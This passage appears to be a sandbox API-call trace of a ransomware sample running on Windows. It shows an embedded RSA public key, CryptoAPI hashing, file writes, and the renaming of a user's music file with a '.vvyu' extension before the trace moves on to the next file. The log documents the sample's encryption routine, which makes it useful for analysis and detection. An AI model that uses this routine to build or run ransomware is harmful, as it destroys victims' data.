KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.300] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.301] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.301] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.301] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.301] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.301] GetLastError () returned 0x0 [0195.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.301] GetLastError () returned 0x0 [0195.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.301] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0195.301] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0195.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.302] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0195.302] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0195.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.302] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0195.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0195.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x19e0) returned 0x2ae9ea0 [0195.302] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae22a8 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63c8 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2260 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63e0 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6428 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0195.303] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2aeb888 [0195.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeb888 | out: hHeap=0x2c0000) returned 1 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6410 [0195.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0195.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.306] GetCurrentThreadId () returned 0x5d8 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae81d8 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.307] GetCurrentThreadId () returned 0x5d8 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6470 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6410 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6428 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae63f8 [0195.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64a0 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6440 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6410 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2aeb888 [0195.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6410 | out: hHeap=0x2c0000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2aebaa0 [0195.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeb888 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aebaa0 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63f8 | out: hHeap=0x2c0000) returned 1 [0195.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0195.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0195.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2260 | out: hHeap=0x2c0000) returned 1 [0195.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.317] WriteFile (in: hFile=0x584, lpBuffer=0x2ae9ea0*, nNumberOfBytesToWrite=0x19d1, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae9ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x19d1, lpOverlapped=0x0) returned 1 [0195.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae9ea0 | out: hHeap=0x2c0000) returned 1 [0195.318] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x19d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.318] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.319] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.319] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.319] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.319] CloseHandle (hObject=0x584) returned 1 [0195.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.321] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0195.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.321] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\6X4EOyI76e.wav" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\6x4eoyi76e.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\Eb_B9k_JDAVxhXh0\\6X4EOyI76e.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\eb_b9k_jdavxhxh0\\6x4eoyi76e.wav.vvyu")) returned 1 [0195.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.322] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.325] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b698a0, ftCreationTime.dwHighDateTime=0x1d89791, ftLastAccessTime.dwLowDateTime=0x1fd04780, ftLastAccessTime.dwHighDateTime=0x1d8a5a5, ftLastWriteTime.dwLowDateTime=0x1fd04780, ftLastWriteTime.dwHighDateTime=0x1d8a5a5, nFileSizeHigh=0x0, nFileSizeLow=0x17cfa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mOm18edC.mp3", cAlternateFileName="")) returned 1 [0195.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.325] RtlAllocateHeap (HeapHandle=0x2c0000, 